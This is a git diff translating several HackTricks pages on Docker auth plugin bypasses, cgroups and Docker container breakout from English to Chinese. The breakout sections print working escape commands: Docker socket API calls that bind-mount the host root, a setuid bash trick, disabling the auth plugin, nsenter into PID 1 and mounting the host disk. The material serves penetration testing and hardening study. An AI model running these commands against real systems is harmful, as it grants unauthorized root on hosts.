**运行任何** Docker 客户端 **命令**。使用 Docker 的引擎 API 联系守护进程的调用者也是如此。如果您需要 **更严格的访问控制**,可以创建 **授权插件** 并将其添加到 Docker 守护进程配置中。使用授权插件,Docker 管理员可以 **配置细粒度访问** 策略来管理对 Docker 守护进程的访问。 -# Basic architecture +# 基本架构 -Docker Auth plugins are **external** **plugins** you can use to **allow/deny** **actions** requested to the Docker Daemon **depending** on the **user** that requested it and the **action** **requested**. +Docker Auth 插件是 **外部** **插件**,您可以使用它们来 **允许/拒绝** 请求到 Docker 守护进程的 **操作**,具体取决于请求的 **用户** 和 **请求的操作**。 -**[The following info is from the docs](https://docs.docker.com/engine/extend/plugins_authorization/#:~:text=If%20you%20require%20greater%20access,access%20to%20the%20Docker%20daemon)** +**[以下信息来自文档](https://docs.docker.com/engine/extend/plugins_authorization/#:~:text=If%20you%20require%20greater%20access,access%20to%20the%20Docker%20daemon)** -When an **HTTP** **request** is made to the Docker **daemon** through the CLI or via the Engine API, the **authentication** **subsystem** **passes** the request to the installed **authentication** **plugin**(s). The request contains the user (caller) and command context. The **plugin** is responsible for deciding whether to **allow** or **deny** the request. +当通过 CLI 或引擎 API 向 Docker **守护进程** 发出 **HTTP** **请求** 时,**身份验证** **子系统** 会将请求传递给已安装的 **身份验证** **插件**。请求包含用户(调用者)和命令上下文。**插件** 负责决定是否 **允许** 或 **拒绝** 请求。 -The sequence diagrams below depict an allow and deny authorization flow: +下面的序列图描绘了允许和拒绝的授权流程: ![Authorization Allow flow](https://docs.docker.com/engine/extend/images/authz_allow.png) ![Authorization Deny flow](https://docs.docker.com/engine/extend/images/authz_deny.png) -Each request sent to the plugin **includes the authenticated user, the HTTP headers, and the request/response body**. Only the **user name** and the **authentication method** used are passed to the plugin. Most importantly, **no** user **credentials** or tokens are passed. Finally, **not all request/response bodies are sent** to the authorization plugin. Only those request/response bodies where the `Content-Type` is either `text/*` or `application/json` are sent. +每个发送到插件的请求 **包括经过身份验证的用户、HTTP 头和请求/响应主体**。只有 **用户名** 和 **使用的身份验证方法** 被传递给插件。最重要的是,**不** 会传递用户 **凭据** 或令牌。最后,**并非所有请求/响应主体都发送** 到授权插件。只有那些 `Content-Type` 为 `text/*` 或 `application/json` 的请求/响应主体会被发送。 -For commands that can potentially hijack the HTTP connection (`HTTP Upgrade`), such as `exec`, the authorization plugin is only called for the initial HTTP requests. Once the plugin approves the command, authorization is not applied to the rest of the flow. Specifically, the streaming data is not passed to the authorization plugins. For commands that return chunked HTTP response, such as `logs` and `events`, only the HTTP request is sent to the authorization plugins. +对于可能劫持 HTTP 连接的命令(`HTTP Upgrade`),如 `exec`,授权插件仅在初始 HTTP 请求时被调用。一旦插件批准命令,后续流程不再应用授权。具体来说,流数据不会传递给授权插件。对于返回分块 HTTP 响应的命令,如 `logs` 和 `events`,仅 HTTP 请求会发送到授权插件。 -During request/response processing, some authorization flows might need to do additional queries to the Docker daemon. To complete such flows, plugins can call the daemon API similar to a regular user. To enable these additional queries, the plugin must provide the means for an administrator to configure proper authentication and security policies. +在请求/响应处理期间,一些授权流程可能需要对 Docker 守护进程进行额外查询。为了完成这些流程,插件可以像普通用户一样调用守护进程 API。为了启用这些额外查询,插件必须提供管理员配置适当身份验证和安全策略的手段。 -## Several Plugins +## 多个插件 -You are responsible for **registering** your **plugin** as part of the Docker daemon **startup**. You can install **multiple plugins and chain them together**. This chain can be ordered. Each request to the daemon passes in order through the chain. Only when **all the plugins grant access** to the resource, is the access granted. +您负责将 **插件** 注册为 Docker 守护进程 **启动** 的一部分。您可以安装 **多个插件并将它们链接在一起**。这个链可以是有序的。每个对守护进程的请求按顺序通过链。只有当 **所有插件都授予对资源的访问** 时,访问才会被授予。 -# Plugin Examples +# 插件示例 ## Twistlock AuthZ Broker -The plugin [**authz**](https://github.com/twistlock/authz) allows you to create a simple **JSON** file that the **plugin** will be **reading** to authorize the requests. Therefore, it gives you the opportunity to control very easily which API endpoints can reach each user. +插件 [**authz**](https://github.com/twistlock/authz) 允许您创建一个简单的 **JSON** 文件,插件将 **读取** 该文件以授权请求。因此,它为您提供了非常简单的机会来控制哪些 API 端点可以到达每个用户。 -This is an example that will allow Alice and Bob can create new containers: `{"name":"policy_3","users":["alice","bob"],"actions":["container_create"]}` +这是一个示例,允许 Alice 和 Bob 创建新容器:`{"name":"policy_3","users":["alice","bob"],"actions":["container_create"]}` -In the page [route_parser.go](https://github.com/twistlock/authz/blob/master/core/route_parser.go) you can find the relation between the requested URL and the action. In the page [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) you can find the relation between the action name and the action +在页面 [route_parser.go](https://github.com/twistlock/authz/blob/master/core/route_parser.go) 中,您可以找到请求的 URL 与操作之间的关系。在页面 [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) 中,您可以找到操作名称与操作之间的关系。 -## Simple Plugin Tutorial +## 简单插件教程 -You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot) +您可以在这里找到一个 **易于理解的插件**,其中包含有关安装和调试的详细信息:[**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot) -Read the `README` and the `plugin.go` code to understand how is it working. +阅读 `README` 和 `plugin.go` 代码以了解其工作原理。 -# Docker Auth Plugin Bypass +# Docker Auth 插件绕过 -## Enumerate access +## 枚举访问 -The main things to check are the **which endpoints are allowed** and **which values of HostConfig are allowed**. +主要检查的内容是 **哪些端点被允许** 和 **哪些 HostConfig 值被允许**。 -To perform this enumeration you can **use the tool** [**https://github.com/carlospolop/docker_auth_profiler**](https://github.com/carlospolop/docker_auth_profiler)**.** +要执行此枚举,您可以 **使用工具** [**https://github.com/carlospolop/docker_auth_profiler**](https://github.com/carlospolop/docker_auth_profiler)**.** -## disallowed `run --privileged` - -### Minimum Privileges +## 不允许的 `run --privileged` +### 最小权限 ```bash docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash ``` +### 运行容器并获得特权会话 -### Running a container and then getting a privileged session - -In this case the sysadmin **disallowed users to mount volumes and run containers with the `--privileged` flag** or give any extra capability to the container: - +在这种情况下,系统管理员**不允许用户挂载卷并使用 `--privileged` 标志运行容器**或给予容器任何额外的能力: ```bash docker run -d --privileged modified-ubuntu docker: Error response from daemon: authorization denied by plugin customauth: [DOCKER FIREWALL] Specified Privileged option value is Disallowed. See 'docker run --help'. ``` - -However, a user can **create a shell inside the running container and give it the extra privileges**: - +然而,用户可以**在运行中的容器内创建一个 shell 并赋予其额外的权限**: ```bash docker run -d --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu #bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de @@ -81,42 +76,38 @@ docker exec -it ---cap-add=ALL bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be # With --cap-add=SYS_ADMIN docker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash ``` +现在,用户可以使用任何[**之前讨论过的技术**](./#privileged-flag)从容器中逃逸并在主机内部**提升权限**。 -Now, the user can escape from the container using any of the [**previously discussed techniques**](./#privileged-flag) and **escalate privileges** inside the host. - -## Mount Writable Folder - -In this case the sysadmin **disallowed users to run containers with the `--privileged` flag** or give any extra capability to the container, and he only allowed to mount the `/tmp` folder: +## 挂载可写文件夹 +在这种情况下,系统管理员**不允许用户使用`--privileged`标志运行容器**或给予容器任何额外的能力,他只允许挂载`/tmp`文件夹: ```bash host> cp /bin/bash /tmp #Cerate a copy of bash host> docker run -it -v /tmp:/host ubuntu:18.04 bash #Mount the /tmp folder of the host and get a shell docker container> chown root:root /host/bash docker container> chmod u+s /host/bash host> /tmp/bash - -p #This will give you a shell as root +-p #This will give you a shell as root ``` - > [!NOTE] -> Note that maybe you cannot mount the folder `/tmp` but you can mount a **different writable folder**. You can find writable directories using: `find / -writable -type d 2>/dev/null` +> 请注意,您可能无法挂载文件夹 `/tmp`,但您可以挂载一个 **不同的可写文件夹**。您可以使用以下命令查找可写目录: `find / -writable -type d 2>/dev/null` > -> **Note that not all the directories in a linux machine will support the suid bit!** In order to check which directories support the suid bit run `mount | grep -v "nosuid"` For example usually `/dev/shm` , `/run` , `/proc` , `/sys/fs/cgroup` and `/var/lib/lxcfs` don't support the suid bit. +> **请注意,并非所有 Linux 机器上的目录都支持 suid 位!** 要检查哪些目录支持 suid 位,请运行 `mount | grep -v "nosuid"`。例如,通常 `/dev/shm`、`/run`、`/proc`、`/sys/fs/cgroup` 和 `/var/lib/lxcfs` 不支持 suid 位。 > -> Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`) +> 还要注意,如果您可以 **挂载 `/etc`** 或任何其他 **包含配置文件** 的文件夹,您可以作为 root 从 docker 容器中更改它们,以便在主机上 **滥用它们** 并提升权限(可能修改 `/etc/shadow`) -## Unchecked API Endpoint +## 未检查的 API 端点 -The responsibility of the sysadmin configuring this plugin would be to control which actions and with which privileges each user can perform. Therefore, if the admin takes a **blacklist** approach with the endpoints and the attributes he might **forget some of them** that could allow an attacker to **escalate privileges.** +配置此插件的系统管理员的责任是控制每个用户可以执行的操作及其权限。因此,如果管理员对端点和属性采取 **黑名单** 方法,他可能会 **忘记其中一些**,这可能允许攻击者 **提升权限**。 -You can check the docker API in [https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#) +您可以在 [https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#) 检查 docker API -## Unchecked JSON Structure +## 未检查的 JSON 结构 -### Binds in root - -It's possible that when the sysadmin configured the docker firewall he **forgot about some important parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Binds**".\ -In the following example it's possible to abuse this misconfiguration to create and run a container that mounts the root (/) folder of the host: +### 根目录中的绑定 +可能在系统管理员配置 docker 防火墙时,他 **忘记了一些重要参数**,例如 [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) 中的 "**Binds**"。\ +在以下示例中,可以利用此错误配置创建并运行一个挂载主机根目录(/)的容器: ```bash docker version #First, find the API version of docker, 1.40 in this example docker images #List the images available @@ -126,38 +117,30 @@ docker start f6932bc153ad #Start the created privileged container docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it #You can access the host filesystem ``` - > [!WARNING] -> Note how in this example we are using the **`Binds`** param as a root level key in the JSON but in the API it appears under the key **`HostConfig`** +> 注意在这个例子中,我们将 **`Binds`** 参数作为 JSON 的根级键使用,但在 API 中它出现在 **`HostConfig`** 键下。 -### Binds in HostConfig - -Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: +### HostConfig 中的 Binds +按照与 **根中的 Binds** 相同的指示,向 Docker API 执行此 **请求**: ```bash curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Binds":["/:/host"]}}' http:/v1.40/containers/create ``` - ### Mounts in root -Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: - +按照与 **Binds in root** 相同的指示,向 Docker API 执行此 **request**: ```bash curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}' http:/v1.40/containers/create ``` - ### Mounts in HostConfig -Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: - +按照与 **Binds in root** 相同的指示,向 Docker API 执行此 **request**: ```bash curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "HostConfig":{"Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}}' http:/v1.40/containers/cre ``` +## 未检查的 JSON 属性 -## Unchecked JSON Attribute - -It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS_MODULE** capability: - +系统管理员在配置 docker 防火墙时,**可能忘记了某个参数的重要属性**,例如在 "**HostConfig**" 中的 [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) 中的 "**Capabilities**"。在以下示例中,可以利用此错误配置创建并运行具有 **SYS_MODULE** 能力的容器: ```bash docker version curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Capabilities":["CAP_SYS_MODULE"]}}' http:/v1.40/containers/create @@ -167,14 +150,12 @@ docker exec -it c52a77629a91 bash capsh --print #You can abuse the SYS_MODULE capability ``` - > [!NOTE] -> The **`HostConfig`** is the key that usually contains the **interesting** **privileges** to escape from the container. However, as we have discussed previously, note how using Binds outside of it also works and may allow you to bypass restrictions. +> **`HostConfig`** 通常是包含 **有趣的** **权限** 的关键,可以用来逃离容器。然而,正如我们之前讨论的,注意在外部使用 Binds 也有效,并且可能允许你绕过限制。 -## Disabling Plugin - -If the **sysadmin** **forgotten** to **forbid** the ability to **disable** the **plugin**, you can take advantage of this to completely disable it! +## 禁用插件 +如果 **sysadmin** **忘记** **禁止** 禁用 **插件** 的能力,你可以利用这一点来完全禁用它! ```bash docker plugin list #Enumerate plugins @@ -186,10 +167,9 @@ docker plugin disable authobot docker run --rm -it --privileged -v /:/host ubuntu bash docker plugin enable authobot ``` +记得在提升权限后**重新启用插件**,否则**重启docker服务将无效**! -Remember to **re-enable the plugin after escalating**, or a **restart of docker service won’t work**! - -## Auth Plugin Bypass writeups +## Auth插件绕过写作 - [https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/](https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/) diff --git a/src/linux-hardening/privilege-escalation/docker-security/cgroups.md b/src/linux-hardening/privilege-escalation/docker-security/cgroups.md index 82614f093..60326927f 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/cgroups.md +++ b/src/linux-hardening/privilege-escalation/docker-security/cgroups.md @@ -2,18 +2,17 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -**Linux Control Groups**, or **cgroups**, are a feature of the Linux kernel that allows the allocation, limitation, and prioritization of system resources like CPU, memory, and disk I/O among process groups. They offer a mechanism for **managing and isolating the resource usage** of process collections, beneficial for purposes such as resource limitation, workload isolation, and resource prioritization among different process groups. +**Linux 控制组**,或称 **cgroups**,是 Linux 内核的一个特性,允许在进程组之间分配、限制和优先处理系统资源,如 CPU、内存和磁盘 I/O。它们提供了一种 **管理和隔离资源使用** 的机制,适用于资源限制、工作负载隔离和不同进程组之间的资源优先级等目的。 -There are **two versions of cgroups**: version 1 and version 2. Both can be used concurrently on a system. The primary distinction is that **cgroups version 2** introduces a **hierarchical, tree-like structure**, enabling more nuanced and detailed resource distribution among process groups. Additionally, version 2 brings various enhancements, including: +**cgroups 有两个版本**:版本 1 和版本 2。两者可以在系统上同时使用。主要区别在于 **cgroups 版本 2** 引入了 **层次化的树状结构**,使得在进程组之间进行更细致和详细的资源分配成为可能。此外,版本 2 还带来了各种增强功能,包括: -In addition to the new hierarchical organization, cgroups version 2 also introduced **several other changes and improvements**, such as support for **new resource controllers**, better support for legacy applications, and improved performance. +除了新的层次化组织,cgroups 版本 2 还引入了 **其他几个变化和改进**,例如对 **新资源控制器** 的支持、更好的遗留应用程序支持和性能提升。 -Overall, cgroups **version 2 offers more features and better performance** than version 1, but the latter may still be used in certain scenarios where compatibility with older systems is a concern. - -You can list the v1 and v2 cgroups for any process by looking at its cgroup file in /proc/\. You can start by looking at your shell’s cgroups with this command: +总体而言,cgroups **版本 2 提供了更多功能和更好的性能**,但在某些需要与旧系统兼容的场景中,仍然可以使用版本 1。 +您可以通过查看 /proc/\ 中的 cgroup 文件来列出任何进程的 v1 和 v2 cgroups。您可以通过以下命令开始查看您 shell 的 cgroups: ```shell-session $ cat /proc/self/cgroup 12:rdma:/ @@ -28,60 +27,53 @@ $ cat /proc/self/cgroup 1:name=systemd:/user.slice/user-1000.slice/session-2.scope 0::/user.slice/user-1000.slice/session-2.scope ``` +输出结构如下: -The output structure is as follows: +- **数字 2–12**:cgroups v1,每行代表一个不同的 cgroup。控制器在数字旁边指定。 +- **数字 1**:也是 cgroups v1,但仅用于管理目的(由例如 systemd 设置),并且没有控制器。 +- **数字 0**:表示 cgroups v2。没有列出控制器,这一行仅在仅运行 cgroups v2 的系统上存在。 +- **名称是层次结构的**,类似于文件路径,指示不同 cgroups 之间的结构和关系。 +- **像 /user.slice 或 /system.slice 的名称** 指定 cgroups 的分类,user.slice 通常用于由 systemd 管理的登录会话,而 system.slice 用于系统服务。 -- **Numbers 2–12**: cgroups v1, with each line representing a different cgroup. Controllers for these are specified adjacent to the number. -- **Number 1**: Also cgroups v1, but solely for management purposes (set by, e.g., systemd), and lacks a controller. -- **Number 0**: Represents cgroups v2. No controllers are listed, and this line is exclusive on systems only running cgroups v2. -- The **names are hierarchical**, resembling file paths, indicating the structure and relationship between different cgroups. -- **Names like /user.slice or /system.slice** specify the categorization of cgroups, with user.slice typically for login sessions managed by systemd and system.slice for system services. +### 查看 cgroups -### Viewing cgroups +文件系统通常用于访问 **cgroups**,与传统用于内核交互的 Unix 系统调用接口不同。要调查 shell 的 cgroup 配置,应检查 **/proc/self/cgroup** 文件,该文件显示 shell 的 cgroup。然后,通过导航到 **/sys/fs/cgroup**(或 **`/sys/fs/cgroup/unified`**)目录并找到一个与 cgroup 名称相同的目录,可以观察与 cgroup 相关的各种设置和资源使用信息。 -The filesystem is typically utilized for accessing **cgroups**, diverging from the Unix system call interface traditionally used for kernel interactions. To investigate a shell's cgroup configuration, one should examine the **/proc/self/cgroup** file, which reveals the shell's cgroup. Then, by navigating to the **/sys/fs/cgroup** (or **`/sys/fs/cgroup/unified`**) directory and locating a directory that shares the cgroup's name, one can observe various settings and resource usage information pertinent to the cgroup. +![Cgroup 文件系统](<../../../images/image (1128).png>) -![Cgroup Filesystem](<../../../images/image (1128).png>) +cgroups 的关键接口文件以 **cgroup** 为前缀。**cgroup.procs** 文件可以使用标准命令如 cat 查看,列出 cgroup 中的进程。另一个文件 **cgroup.threads** 包含线程信息。 -The key interface files for cgroups are prefixed with **cgroup**. The **cgroup.procs** file, which can be viewed with standard commands like cat, lists the processes within the cgroup. Another file, **cgroup.threads**, includes thread information. +![Cgroup 进程](<../../../images/image (281).png>) -![Cgroup Procs](<../../../images/image (281).png>) +管理 shell 的 cgroups 通常包含两个控制器,用于调节内存使用和进程数量。要与控制器交互,应参考带有控制器前缀的文件。例如,**pids.current** 将被引用以确定 cgroup 中的线程数量。 -Cgroups managing shells typically encompass two controllers that regulate memory usage and process count. To interact with a controller, files bearing the controller's prefix should be consulted. For instance, **pids.current** would be referenced to ascertain the count of threads in the cgroup. +![Cgroup 内存](<../../../images/image (677).png>) -![Cgroup Memory](<../../../images/image (677).png>) +值中 **max** 的指示表明 cgroup 没有特定限制。然而,由于 cgroups 的层次结构,限制可能由目录层次结构中较低级别的 cgroup 强加。 -The indication of **max** in a value suggests the absence of a specific limit for the cgroup. However, due to the hierarchical nature of cgroups, limits might be imposed by a cgroup at a lower level in the directory hierarchy. - -### Manipulating and Creating cgroups - -Processes are assigned to cgroups by **writing their Process ID (PID) to the `cgroup.procs` file**. This requires root privileges. For instance, to add a process: +### 操作和创建 cgroups +通过 **将其进程 ID (PID) 写入 `cgroup.procs` 文件** 将进程分配给 cgroups。这需要 root 权限。例如,要添加一个进程: ```bash echo [pid] > cgroup.procs ``` - -Similarly, **modifying cgroup attributes, like setting a PID limit**, is done by writing the desired value to the relevant file. To set a maximum of 3,000 PIDs for a cgroup: - +同样,**修改 cgroup 属性,例如设置 PID 限制**,是通过将所需值写入相关文件来完成的。要为 cgroup 设置最多 3,000 个 PID: ```bash echo 3000 > pids.max ``` +**创建新的 cgroups** 涉及在 cgroup 层次结构中创建一个新的子目录,这会提示内核自动生成必要的接口文件。尽管没有活动进程的 cgroups 可以使用 `rmdir` 删除,但要注意某些限制: -**Creating new cgroups** involves making a new subdirectory within the cgroup hierarchy, which prompts the kernel to automatically generate necessary interface files. Though cgroups without active processes can be removed with `rmdir`, be aware of certain constraints: - -- **Processes can only be placed in leaf cgroups** (i.e., the most nested ones in a hierarchy). -- **A cgroup cannot possess a controller absent in its parent**. -- **Controllers for child cgroups must be explicitly declared** in the `cgroup.subtree_control` file. For example, to enable CPU and PID controllers in a child cgroup: - +- **进程只能放置在叶子 cgroups 中**(即层次结构中最嵌套的那些)。 +- **一个 cgroup 不能拥有其父级中缺失的控制器**。 +- **子 cgroups 的控制器必须在 `cgroup.subtree_control` 文件中显式声明**。例如,要在子 cgroup 中启用 CPU 和 PID 控制器: ```bash echo "+cpu +pids" > cgroup.subtree_control ``` +**root cgroup** 是这些规则的一个例外,允许直接放置进程。这可以用来将进程从 systemd 管理中移除。 -The **root cgroup** is an exception to these rules, allowing direct process placement. This can be used to remove processes from systemd management. +在 cgroup 中 **监控 CPU 使用情况** 可以通过 `cpu.stat` 文件实现,该文件显示总的 CPU 时间消耗,有助于跟踪服务的子进程的使用情况: -**Monitoring CPU usage** within a cgroup is possible through the `cpu.stat` file, displaying total CPU time consumed, helpful for tracking usage across a service's subprocesses: - -

CPU usage statistics as shown in the cpu.stat file

+

cpu.stat 文件中显示的 CPU 使用统计信息

## References diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md index e19fddb22..f9096098b 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md @@ -2,35 +2,24 @@ {{#include ../../../../banners/hacktricks-training.md}} -
+## 自动枚举与逃逸 -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +- [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): 它也可以 **枚举容器** +- [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): 这个工具非常 **有用来枚举你所在的容器,甚至尝试自动逃逸** +- [**amicontained**](https://github.com/genuinetools/amicontained): 有用的工具来获取容器的权限,以便找到逃逸的方法 +- [**deepce**](https://github.com/stealthcopter/deepce): 用于枚举和逃逸容器的工具 +- [**grype**](https://github.com/anchore/grype): 获取镜像中安装的软件所包含的 CVE -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %} - -## Automatic Enumeration & Escape - -- [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers** -- [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): This tool is pretty **useful to enumerate the container you are into even try to escape automatically** -- [**amicontained**](https://github.com/genuinetools/amicontained): Useful tool to get the privileges the container has in order to find ways to escape from it -- [**deepce**](https://github.com/stealthcopter/deepce): Tool to enumerate and escape from containers -- [**grype**](https://github.com/anchore/grype): Get the CVEs contained in the software installed in the image - -## Mounted Docker Socket Escape - -If somehow you find that the **docker socket is mounted** inside the docker container, you will be able to escape from it.\ -This usually happen in docker containers that for some reason need to connect to docker daemon to perform actions. +## 挂载的 Docker 套接字逃逸 +如果你发现 **docker 套接字被挂载** 在 docker 容器内,你将能够从中逃逸。\ +这通常发生在某些需要连接到 docker 守护进程以执行操作的 docker 容器中。 ```bash #Search the socket find / -name docker.sock 2>/dev/null #It's usually in /run/docker.sock ``` - -In this case you can use regular docker commands to communicate with the docker daemon: - +在这种情况下,您可以使用常规的 docker 命令与 docker 守护进程进行通信: ```bash #List images to use one docker images @@ -44,14 +33,13 @@ nsenter --target 1 --mount --uts --ipc --net --pid -- bash # Get full privs in container without --privileged docker run -it -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host ubuntu chroot /host/ bash ``` +> [!NOTE] +> 如果 **docker socket 在意外的位置**,您仍然可以使用带有参数 **`-H unix:///path/to/docker.sock`** 的 **`docker`** 命令与其通信。 + +Docker 守护进程也可能 [在端口上监听 (默认 2375, 2376)](../../../../network-services-pentesting/2375-pentesting-docker.md),或者在基于 Systemd 的系统上,可以通过 Systemd socket `fd://` 与 Docker 守护进程进行通信。 > [!NOTE] -> In case the **docker socket is in an unexpected place** you can still communicate with it using the **`docker`** command with the parameter **`-H unix:///path/to/docker.sock`** - -Docker daemon might be also [listening in a port (by default 2375, 2376)](../../../../network-services-pentesting/2375-pentesting-docker.md) or on Systemd-based systems, communication with the Docker daemon can occur over the Systemd socket `fd://`. - -> [!NOTE] -> Additionally, pay attention to the runtime sockets of other high-level runtimes: +> 此外,请注意其他高级运行时的运行时套接字: > > - dockershim: `unix:///var/run/dockershim.sock` > - containerd: `unix:///run/containerd/containerd.sock` @@ -60,25 +48,23 @@ Docker daemon might be also [listening in a port (by default 2375, 2376)](../../ > - rktlet: `unix:///var/run/rktlet.sock` > - ... -## Capabilities Abuse Escape +## 能力滥用逃逸 -You should check the capabilities of the container, if it has any of the following ones, you might be able to scape from it: **`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE, CAP_SYS_RAWIO`, `CAP_SYSLOG`, `CAP_NET_RAW`, `CAP_NET_ADMIN`** - -You can check currently container capabilities using **previously mentioned automatic tools** or: +您应该检查容器的能力,如果它具有以下任何一种,您可能能够逃离它: **`CAP_SYS_ADMIN`**、**`CAP_SYS_PTRACE`**、**`CAP_SYS_MODULE`**、**`DAC_READ_SEARCH`**、**`DAC_OVERRIDE`、`CAP_SYS_RAWIO`、`CAP_SYSLOG`、`CAP_NET_RAW`、`CAP_NET_ADMIN`** +您可以使用 **之前提到的自动工具** 或: ```bash capsh --print ``` - -In the following page you can **learn more about linux capabilities** and how to abuse them to escape/escalate privileges: +在以下页面中,您可以**了解更多关于 Linux 能力**的信息,以及如何滥用它们以逃逸/提升权限: {{#ref}} ../../linux-capabilities.md {{#endref}} -## Escape from Privileged Containers +## 从特权容器逃逸 -A privileged container can be created with the flag `--privileged` or disabling specific defenses: +可以使用 `--privileged` 标志或禁用特定防御来创建特权容器: - `--cap-add=ALL` - `--security-opt apparmor=unconfined` @@ -90,51 +76,44 @@ A privileged container can be created with the flag `--privileged` or disabling - `--cgroupns=host` - `Mount /dev` -The `--privileged` flag significantly lowers container security, offering **unrestricted device access** and bypassing **several protections**. For a detailed breakdown, refer to the documentation on `--privileged`'s full impacts. +`--privileged` 标志显著降低了容器安全性,提供**无限制的设备访问**并绕过**多个保护**。有关详细信息,请参阅 `--privileged` 的完整影响文档。 {{#ref}} ../docker-privileged.md {{#endref}} -### Privileged + hostPID +### 特权 + hostPID -With these permissions you can just **move to the namespace of a process running in the host as root** like init (pid:1) just running: `nsenter --target 1 --mount --uts --ipc --net --pid -- bash` - -Test it in a container executing: +使用这些权限,您可以简单地**移动到作为 root 运行的主机中的进程的命名空间**,例如 init (pid:1),只需运行:`nsenter --target 1 --mount --uts --ipc --net --pid -- bash` +在容器中执行测试: ```bash docker run --rm -it --pid=host --privileged ubuntu bash ``` +### 特权 -### Privileged - -Just with the privileged flag you can try to **access the host's disk** or try to **escape abusing release_agent or other escapes**. - -Test the following bypasses in a container executing: +仅凭特权标志,您可以尝试 **访问主机的磁盘** 或尝试 **通过 release_agent 或其他逃逸进行逃逸**。 +在容器中执行以下绕过测试: ```bash docker run --rm -it --privileged ubuntu bash ``` +#### 挂载磁盘 - Poc1 -#### Mounting Disk - Poc1 - -Well configured docker containers won't allow command like **fdisk -l**. However on miss-configured docker command where the flag `--privileged` or `--device=/dev/sda1` with caps is specified, it is possible to get the privileges to see the host drive. +配置良好的 docker 容器不会允许像 **fdisk -l** 这样的命令。然而,在错误配置的 docker 命令中,如果指定了标志 `--privileged` 或 `--device=/dev/sda1`,则可以获得查看主机驱动器的权限。 ![](https://bestestredteam.com/content/images/2019/08/image-16.png) -So to take over the host machine, it is trivial: - +因此,要接管主机机器,这很简单: ```bash mkdir -p /mnt/hola mount /dev/sda1 /mnt/hola ``` +而且,瞧!您现在可以访问主机的文件系统,因为它已挂载在 `/mnt/hola` 文件夹中。 -And voilà ! You can now access the filesystem of the host because it is mounted in the `/mnt/hola` folder. - -#### Mounting Disk - Poc2 - -Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector: +#### 挂载磁盘 - Poc2 +在容器内,攻击者可能会尝试通过集群创建的可写 hostPath 卷进一步访问底层主机操作系统。以下是您可以在容器内检查的一些常见事项,以查看您是否可以利用此攻击者向量: ```bash ### Check if You Can Write to a File-system echo 1 > /proc/sysrq-trigger @@ -155,9 +134,7 @@ mount: /mnt: permission denied. ---> Failed! but if not, you may have access to ### debugfs (Interactive File System Debugger) debugfs /dev/sda1 ``` - -#### Privileged Escape Abusing existent release_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC1 - +#### 特权逃逸 利用现有的 release_agent 